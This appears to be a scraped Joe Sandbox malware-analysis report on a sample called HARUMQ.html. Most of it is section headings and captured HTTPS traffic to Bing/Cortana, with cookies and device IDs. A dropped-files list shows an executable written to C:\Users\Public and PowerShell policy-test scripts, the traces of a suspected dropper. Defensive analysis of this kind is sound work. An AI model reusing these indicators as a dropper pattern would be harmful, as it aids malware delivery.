2024-01-26 09:17:39 UTC	2390	OUT	GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=notepa&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=6&cvid=693df9a8be554bffb57e511bdf55aece&ig=916141930a7c43bcb8314a88e833d4d1 HTTP/1.1 Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept: / Accept-Language: en-CH X-Agent-DeviceId: 01000A4109009A83 X-BM-CBT: 1696585056 X-BM-ClientFeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStore X-BM-DateFormat: dd/MM/yyyy X-BM-DeviceDimensions: 784x984 X-BM-DeviceDimensionsLogical: 784x984 X-BM-DeviceScale: 100 X-BM-DTZ: 120 X-BM-Market: CH X-BM-Theme: 000000;0078d7 X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:2C89765 X-Device-ClientSession: 8B0BADD9680C444587B50653454AB647 X-Device-isOptin: false X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A} X-Device-OSSKU: 48 X-Device-Touch: false X-DeviceID: 01000A4109009A83 X-MSEdge-ExternalExp: bfbscope1003t3,bfbwsbpphmemqcf,bfbwsbrs0830cf,d-thshld78,d-thshldspcl40,disfbcthas2_1,fliptrat6,spofglclicksh-c2,wsbqfasmsall_c,wsbref-c X-MSEdge-ExternalExpType: JointCoord X-PositionerType: Desktop X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI X-Search-CortanaAvailableCapabilities: None X-Search-SafeSearch: Moderate X-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard Time X-UserAgeClass: Unknown Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: www.bing.com Connection: Keep-Alive Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=1F9344FA7B5C6D050D8557587A606C51&CPID=1696585056799&AC=1&CPH=074c06b2&CBV=39996767; _EDGE_S=SID=1F9344FA7B5C6D050D8557587A606C51; SRCHUID=V=2&GUID=1365D4FE3DA84D19A46408EFC15FC823&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231006; SRCHHPGUSR=SRCHLANG=en&HV=1706260657&IPMH=9aa1009e&IPMID=1696585056799&LUT=1696585056224; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
2024-01-26 09:17:40 UTC	1065	IN	HTTP/1.1 200 OK Content-Length: 9218 Content-Type: application/json; charset=utf-8 Cache-Control: no-cache, no-store, must-revalidate Expires: -1 Pragma: no-cache X-EventID: 65b378b40c2a40059f038098cba54bf6 X-AS-SetSessionMarket: de-ch UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0= X-XSS-Protection: 0 P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND" Date: Fri, 26 Jan 2024 09:17:40 GMT Connection: close Set-Cookie: _EDGE_S=SID=1F9344FA7B5C6D050D8557587A606C51&mkt=de-ch; domain=.bing.com; path=/; HttpOnly Set-Cookie: SRCHHPGUSR=SRCHLANG=de&HV=1706260657&IPMH=9aa1009e&IPMID=1696585056799&LUT=1696585056224; domain=.bing.com; expires=Wed, 19-Feb-2025 09:17:40 GMT; path=/; secure; SameSite=None Alt-Svc: h3=":443"; ma=93600 X-CDN-TraceID: 0.15ed0117.1706260659.4830efad
2024-01-26 09:17:40 UTC	9218	IN	Data Raw: 7b 22 52 65 73 6f 75 72 63 65 73 22 3a 7b 22 53 74 79 6c 65 73 22 3a 7b 22 43 73 73 48 65 61 64 4e 6f 72 6d 61 6c 22 3a 7b 7d 2c 22 43 73 73 48 65 61 64 4f 76 65 72 72 69 64 65 22 3a 7b 7d 7d 2c 22 53 63 72 69 70 74 73 22 3a 7b 22 4a 73 48 65 61 64 54 6f 70 6d 6f 73 74 22 3a 7b 7d 2c 22 4a 73 48 65 61 64 4e 6f 72 6d 61 6c 22 3a 7b 7d 2c 22 4a 73 45 6e 64 4f 66 43 68 75 6e 6b 22 3a 7b 7d 2c 22 4a 73 42 65 66 6f 72 65 43 6f 6e 74 65 6e 74 22 3a 7b 7d 2c 22 4a 73 41 66 74 65 72 43 6f 6e 74 65 6e 74 22 3a 7b 7d 2c 22 4a 73 41 66 74 65 72 4f 6e 4c 6f 61 64 22 3a 7b 7d 7d 7d 2c 22 53 75 67 67 65 73 74 69 6f 6e 73 22 3a 5b 7b 22 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 75 72 6c 22 3a 22 2f 73 65 61 72 63 68 3f 71 3d 6e 6f 74 65 70 61 64 5c 75 30 30 32 36 66 69 Data Ascii: {"Resources":{"Styles":{"CssHeadNormal":{},"CssHeadOverride":{}},"Scripts":{"JsHeadTopmost":{},"JsHeadNormal":{},"JsEndOfChunk":{},"JsBeforeContent":{},"JsAfterContent":{},"JsAfterOnLoad":{}}},"Suggestions":[{"Attributes":{"url":"/search?q=notepad\u0026fi

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report HARUMQ.html

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Other

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

Phishing

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\filename.exe

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pzkscagc.r3q.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tqvsfwa5.dcp.ps1

C:\Users\user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JONTBIVYR72E7SG3O32U.temp

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 77

\Device\ConDrv

Static File Info

General

File Icon

Windows Analysis Report
HARUMQ.html

Timestamp	Bytes transferred	Direction	Data
2024-01-26 09:17:39 UTC	869	OUT	GET /rb/1c/cir3,ortl,cc,nc/n7LMSoHYYIBGa1VPMlnTzxBvlfA.css?bu=B6UCSJMCe11drgI&or=w HTTP/1.1 Accept: / Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: r.bing.com Connection: Keep-Alive Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=1F9344FA7B5C6D050D8557587A606C51&CPID=1696585056799&AC=1&CPH=074c06b2&CBV=39996767; _EDGE_S=SID=1F9344FA7B5C6D050D8557587A606C51&mkt=de-ch; SRCHUID=V=2&GUID=1365D4FE3DA84D19A46408EFC15FC823&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231006; SRCHHPGUSR=SRCHLANG=de&HV=1706260657&IPMH=9aa1009e&IPMID=1696585056799&LUT=1696585056224; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E
2024-01-26 09:17:40 UTC	1209	IN	HTTP/1.1 200 OK Content-Type: text/css; charset=utf-8 Server: Kestrel Access-Control-Allow-Headers: * Access-Control-Allow-Origin: * Last-Modified: Sat, 14 Aug 2010 22:23:56 GMT X-EventID: 6591d6f41d2f435ea5d3b71ea2c0d363 UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0= X-AS-InstrumentationOptions: AppServerLoggingMaster=1 X-AS-MACHINENAME: MWHEEEAP0024F99 X-AS-SuppressSetCookie: 1 X-XSS-Protection: 0 cross-origin-resource-policy: cross-origin nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.5} report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]} Cache-Control: public, max-age=226216 Expires: Mon, 29 Jan 2024 00:07:56 GMT Date: Fri, 26 Jan 2024 09:17:40 GMT Content-Length: 5901 Connection: close Alt-Svc: h3=":443"; ma=93600 Akamai-GRN: 0.07a6dc17.1706260660.406dcc3f Timing-Allow-Origin: *
2024-01-26 09:17:40 UTC	5901	IN	Data Raw: 2e 62 5f 73 65 61 72 63 68 62 6f 78 53 75 62 6d 69 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 72 70 2f 34 69 5a 49 7a 5f 6f 41 4c 31 79 70 37 64 69 5f 36 44 39 65 32 65 6e 58 69 4d 4d 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 2d 34 32 70 78 20 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 33 32 30 70 78 20 33 38 70 78 7d 2e 62 5f 6c 6f 67 6f 7b 77 69 64 74 68 3a 32 32 70 78 3b 68 65 69 67 68 74 3a 33 37 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 64 69 72 65 63 74 69 6f 6e 3a 6c 74 72 7d 2e 62 5f 6c 6f 67 6f 3a 61 66 74 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 64 Data Ascii: .b_searchboxSubmit{background:url(/rp/4iZIz_oAL1yp7di_6D9e2enXiMM.png) no-repeat -42px 0;background-size:320px 38px}.b_logo{width:22px;height:37px;position:relative;display:inline-block;overflow:hidden;direction:ltr}.b_logo:after{position:absolute;top:0;d

Timestamp	Bytes transferred	Direction	Data
2024-01-26 09:17:39 UTC	2391	OUT	GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=notepad&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=7&cvid=693df9a8be554bffb57e511bdf55aece&ig=79790c2131664f4c8a9426e43c0ed1af HTTP/1.1 Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept: / Accept-Language: en-CH X-Agent-DeviceId: 01000A4109009A83 X-BM-CBT: 1696585056 X-BM-ClientFeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStore X-BM-DateFormat: dd/MM/yyyy X-BM-DeviceDimensions: 784x984 X-BM-DeviceDimensionsLogical: 784x984 X-BM-DeviceScale: 100 X-BM-DTZ: 120 X-BM-Market: CH X-BM-Theme: 000000;0078d7 X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:2C89765 X-Device-ClientSession: 8B0BADD9680C444587B50653454AB647 X-Device-isOptin: false X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A} X-Device-OSSKU: 48 X-Device-Touch: false X-DeviceID: 01000A4109009A83 X-MSEdge-ExternalExp: bfbscope1003t3,bfbwsbpphmemqcf,bfbwsbrs0830cf,d-thshld78,d-thshldspcl40,disfbcthas2_1,fliptrat6,spofglclicksh-c2,wsbqfasmsall_c,wsbref-c X-MSEdge-ExternalExpType: JointCoord X-PositionerType: Desktop X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI X-Search-CortanaAvailableCapabilities: None X-Search-SafeSearch: Moderate X-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard Time X-UserAgeClass: Unknown Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: www.bing.com Connection: Keep-Alive Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=1F9344FA7B5C6D050D8557587A606C51&CPID=1696585056799&AC=1&CPH=074c06b2&CBV=39996767; _EDGE_S=SID=1F9344FA7B5C6D050D8557587A606C51; SRCHUID=V=2&GUID=1365D4FE3DA84D19A46408EFC15FC823&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231006; SRCHHPGUSR=SRCHLANG=en&HV=1706260657&IPMH=9aa1009e&IPMID=1696585056799&LUT=1696585056224; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
2024-01-26 09:17:40 UTC	1065	IN	HTTP/1.1 200 OK Content-Length: 9197 Content-Type: application/json; charset=utf-8 Cache-Control: no-cache, no-store, must-revalidate Expires: -1 Pragma: no-cache X-EventID: 65b378b492564dfc9f601d592004d293 X-AS-SetSessionMarket: de-ch UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0= X-XSS-Protection: 0 P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND" Date: Fri, 26 Jan 2024 09:17:40 GMT Connection: close Set-Cookie: _EDGE_S=SID=1F9344FA7B5C6D050D8557587A606C51&mkt=de-ch; domain=.bing.com; path=/; HttpOnly Set-Cookie: SRCHHPGUSR=SRCHLANG=de&HV=1706260657&IPMH=9aa1009e&IPMID=1696585056799&LUT=1696585056224; domain=.bing.com; expires=Wed, 19-Feb-2025 09:17:40 GMT; path=/; secure; SameSite=None Alt-Svc: h3=":443"; ma=93600 X-CDN-TraceID: 0.15ed0117.1706260660.4830f059
2024-01-26 09:17:40 UTC	9197	IN	Data Raw: 7b 22 52 65 73 6f 75 72 63 65 73 22 3a 7b 22 53 74 79 6c 65 73 22 3a 7b 22 43 73 73 48 65 61 64 4e 6f 72 6d 61 6c 22 3a 7b 7d 2c 22 43 73 73 48 65 61 64 4f 76 65 72 72 69 64 65 22 3a 7b 7d 7d 2c 22 53 63 72 69 70 74 73 22 3a 7b 22 4a 73 48 65 61 64 54 6f 70 6d 6f 73 74 22 3a 7b 7d 2c 22 4a 73 48 65 61 64 4e 6f 72 6d 61 6c 22 3a 7b 7d 2c 22 4a 73 45 6e 64 4f 66 43 68 75 6e 6b 22 3a 7b 7d 2c 22 4a 73 42 65 66 6f 72 65 43 6f 6e 74 65 6e 74 22 3a 7b 7d 2c 22 4a 73 41 66 74 65 72 43 6f 6e 74 65 6e 74 22 3a 7b 7d 2c 22 4a 73 41 66 74 65 72 4f 6e 4c 6f 61 64 22 3a 7b 7d 7d 7d 2c 22 53 75 67 67 65 73 74 69 6f 6e 73 22 3a 5b 7b 22 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 75 72 6c 22 3a 22 2f 73 65 61 72 63 68 3f 71 3d 6e 6f 74 65 70 61 64 5c 75 30 30 32 36 66 69 Data Ascii: {"Resources":{"Styles":{"CssHeadNormal":{},"CssHeadOverride":{}},"Scripts":{"JsHeadTopmost":{},"JsHeadNormal":{},"JsEndOfChunk":{},"JsBeforeContent":{},"JsAfterContent":{},"JsAfterOnLoad":{}}},"Suggestions":[{"Attributes":{"url":"/search?q=notepad\u0026fi

Timestamp	Bytes transferred	Direction	Data
2024-01-26 09:17:40 UTC	2285	OUT	POST /threshold/xls.aspx HTTP/1.1 Origin: https://www.bing.com Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept: / Accept-Language: en-CH Content-type: text/xml X-Agent-DeviceId: 01000A4109009A83 X-BM-CBT: 1696585056 X-BM-DateFormat: dd/MM/yyyy X-BM-DeviceDimensions: 784x984 X-BM-DeviceDimensionsLogical: 784x984 X-BM-DeviceScale: 100 X-BM-DTZ: 120 X-BM-Market: CH X-BM-Theme: 000000;0078d7 X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:2C89765 X-Device-ClientSession: 8B0BADD9680C444587B50653454AB647 X-Device-isOptin: false X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A} X-Device-OSSKU: 48 X-Device-Touch: false X-DeviceID: 01000A4109009A83 X-MSEdge-ExternalExp: bfbscope1003t3,bfbwsbpphmemqcf,bfbwsbrs0830cf,d-thshld78,d-thshldspcl40,disfbcthas2_1,fliptrat6,spofglclicksh-c2,wsbqfasmsall_c,wsbref-c X-MSEdge-ExternalExpType: JointCoord X-PositionerType: Desktop X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI X-Search-CortanaAvailableCapabilities: None X-Search-SafeSearch: Moderate X-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard Time X-UserAgeClass: Unknown Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: www.bing.com Content-Length: 51156 Connection: Keep-Alive Cache-Control: no-cache Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=1F9344FA7B5C6D050D8557587A606C51&CPID=1696585056799&AC=1&CPH=074c06b2&CBV=39996767; _EDGE_S=SID=1F9344FA7B5C6D050D8557587A606C51&mkt=de-ch; SRCHUID=V=2&GUID=1365D4FE3DA84D19A46408EFC15FC823&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231006; SRCHHPGUSR=SRCHLANG=de&HV=1706260657&IPMH=9aa1009e&IPMID=1696585056799&LUT=1696585056224; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
2024-01-26 09:17:40 UTC	16355	OUT	Data Raw: 3c 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 35 30 34 37 45 35 39 34 32 42 42 32 34 36 30 45 41 33 35 42 35 33 43 43 46 37 38 44 44 42 33 44 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 50 54 3c 2f 54 3e 3c 49 47 3e 36 34 38 31 41 46 33 32 31 31 46 30 34 33 44 41 39 30 30 39 46 46 31 30 39 32 45 43 36 45 36 46 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 70 70 22 3a 7b 22 53 22 3a 22 4c 22 2c 22 46 43 22 3a 36 35 2c 22 42 43 22 3a 36 35 2c 22 48 22 Data Ascii: <ClientInstRequest><CID>5047E5942BB2460EA35B53CCF78DDB3D</CID><Events><E><T>Event.CPT</T><IG>6481AF3211F043DA9009FF1092EC6E6F</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","pp":{"S":"L","FC":65,"BC":65,"H"
2024-01-26 09:17:40 UTC	16355	OUT	Data Raw: 22 51 22 3a 22 43 6f 6d 6d 61 6e 64 20 50 72 6f 6d 70 74 22 2c 22 56 61 6c 22 3a 22 54 4f 50 4c 22 2c 22 48 6f 22 3a 32 2c 22 47 72 22 3a 33 36 2c 22 44 65 76 69 63 65 53 69 67 6e 61 6c 73 22 3a 7b 22 52 61 6e 6b 22 3a 30 2c 22 50 48 69 74 73 22 3a 22 53 79 73 74 65 6d 2e 50 61 72 73 69 6e 67 4e 61 6d 65 22 2c 22 49 64 22 3a 22 7b 31 41 43 31 34 45 37 37 2d 30 32 45 37 2d 34 45 35 44 2d 42 37 34 34 2d 32 45 42 31 41 45 35 31 39 38 42 37 7d 5c 5c 63 6d 64 2e 65 78 65 22 2c 22 44 4e 61 6d 65 22 3a 22 43 6f 6d 6d 61 6e 64 20 50 72 6f 6d 70 74 22 2c 22 4c 41 44 22 3a 22 32 30 32 33 2d 31 30 2d 30 36 54 30 39 3a 32 35 3a 32 36 2e 38 37 35 5a 22 2c 22 41 70 70 4c 6e 63 68 22 3a 32 2c 22 41 72 67 73 22 3a 30 2c 22 4d 44 4e 22 3a 30 2c 22 45 78 74 22 3a 22 2e 65 Data Ascii: "Q":"Command Prompt","Val":"TOPL","Ho":2,"Gr":36,"DeviceSignals":{"Rank":0,"PHits":"System.ParsingName","Id":"{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\cmd.exe","DName":"Command Prompt","LAD":"2023-10-06T09:25:26.875Z","AppLnch":2,"Args":0,"MDN":0,"Ext":".e
2024-01-26 09:17:40 UTC	16355	OUT	Data Raw: 2c 22 41 70 70 4c 6e 63 68 22 3a 30 2c 22 41 72 67 73 22 3a 30 2c 22 4d 44 4e 22 3a 31 2c 22 45 78 74 22 3a 22 22 7d 7d 5d 7d 5d 5d 5d 3e 3c 2f 44 53 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 45 6e 72 69 63 68 65 64 43 6c 69 65 6e 74 49 6e 66 6f 22 3a 7b 22 4d 55 49 44 22 3a 22 35 30 34 37 45 35 39 34 32 42 42 32 34 36 30 45 41 33 35 42 35 33 43 43 46 37 38 44 44 42 33 44 22 2c 22 41 43 56 65 72 22 3a 22 30 37 34 63 30 36 62 32 22 2c 22 46 44 50 61 72 74 6e 65 72 45 6e 74 72 79 22 3a 22 61 75 74 6f 73 75 67 67 65 73 74 Data Ascii: ,"AppLnch":0,"Args":0,"MDN":1,"Ext":""}}]}]...</DS><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","EnrichedClientInfo":{"MUID":"5047E5942BB2460EA35B53CCF78DDB3D","ACVer":"074c06b2","FDPartnerEntry":"autosuggest
2024-01-26 09:17:40 UTC	2091	OUT	Data Raw: 74 73 22 3a 22 46 58 3a 31 31 37 42 39 38 37 32 2c 46 58 3a 31 31 39 45 32 36 41 44 2c 46 58 3a 31 31 43 30 45 39 36 43 2c 46 58 3a 31 31 43 36 45 35 43 32 2c 46 58 3a 31 31 43 37 45 42 36 41 2c 46 58 3a 31 31 43 39 34 30 38 41 2c 46 58 3a 31 31 43 39 34 30 44 42 2c 46 58 3a 31 31 43 42 39 41 39 46 2c 46 58 3a 31 31 43 42 39 41 43 31 2c 46 58 3a 31 31 43 43 31 31 31 43 2c 46 58 3a 31 31 44 35 42 46 43 44 2c 46 58 3a 31 31 44 46 35 42 31 32 2c 46 58 3a 31 31 44 46 35 42 37 35 2c 46 58 3a 31 32 34 30 39 33 31 42 2c 46 58 3a 31 32 34 42 33 38 44 30 2c 46 58 3a 31 32 37 46 43 38 37 38 2c 46 58 3a 31 32 38 33 46 46 45 38 2c 46 58 3a 31 32 38 34 30 36 31 37 2c 46 58 3a 31 32 38 39 37 39 46 39 2c 46 58 3a 31 32 38 45 42 44 37 45 2c 46 58 3a 31 32 39 31 33 35 42 Data Ascii: ts":"FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135B
2024-01-26 09:17:40 UTC	476	IN	HTTP/1.1 204 No Content Access-Control-Allow-Origin: * Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 6AB7C8613C5E4B4CA96FC5EDEE34A6FE Ref B: BY3EDGE0320 Ref C: 2024-01-26T09:17:40Z Date: Fri, 26 Jan 2024 09:17:40 GMT Connection: close Alt-Svc: h3=":443"; ma=93600 X-CDN-TraceID: 0.15ed0117.1706260660.4830f21d

Timestamp	Bytes transferred	Direction	Data
